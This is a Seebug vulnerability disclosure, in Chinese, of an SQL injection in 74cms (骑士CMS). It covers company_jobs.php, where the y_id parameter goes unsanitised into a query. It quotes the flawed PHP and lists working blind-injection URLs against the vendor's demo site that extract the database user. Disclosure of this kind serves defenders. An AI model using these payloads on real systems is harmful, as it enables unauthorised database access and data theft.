骑士CMS某接口SQL注入

2014-11-04T00:00:00
ID SSV:94133
Type seebug
Reporter Root
Modified 2014-11-04T00:00:00

Description

简要描述:

骑士CMS某接口SQL注入,官网测试。

详细说明:

翻了翻代码,看到有这么一段: user/company/company_jobs.php:

``` elseif ($act=='jobs_perform') { global $_CFG; $yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id']; $jobs_num=count($yid); if (empty($yid)) { showmsg("ÄãûÓÐÑ¡Ôñְλ£¡",1); }

$refresh=!empty($_POST['refresh'])?$_POST['refresh']:$_GET['refresh'];
$delete=!empty($_POST['delete'])?$_POST['delete']:$_GET['delete'];
    if ($refresh)
{
    if($jobs_num==1){
        if(is_array($yid)){
            $yid = $yid[0];
        }
        $jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid);
        if(empty($jobs_info)){
            $jobs_info = $db->getone("select * from ".table('jobs_tmp')." where id=".$yid);
        }
        if($jobs_info['deadline']<time()){
            showmsg("žÃְλÒѵœÆÚ£¬ÇëÏÈÑÓÆÚ£¡",1);
        }
    }

```

下面的GET/POST参数没有check,

$yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id']

然后就带入了SQL:

$jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid);

这不是可以注入么?官网试试,果然是这样:

http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19%27

返回SQL错误:

<img src="https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

好了,试试盲注猜user(): 错误的返回:

http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(110))

<img src="https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

正确时候的返回:

http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(114))

<img src="https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

中间过程略,可以猜到:

http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116))

<img src="https://images.seebug.org/upload/201411/011806477efd8b7deb1fc2e53542c3b5121afc9e.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

&gt; select char(114,111,111,116,64,108,111,99,97,108,104,111,115,116); +------------------------------------------------------------+ | char(114,111,111,116,64,108,111,99,97,108,104,111,115,116) | +------------------------------------------------------------+ | root@localhost | +------------------------------------------------------------+ 1 row in set (0.00 sec)

漏洞证明:

http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19%27

<img src="https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(110))

<img src="https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(114))

<img src="https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png" alt="4.png" width="600" onerror="javascript:errimg(this);">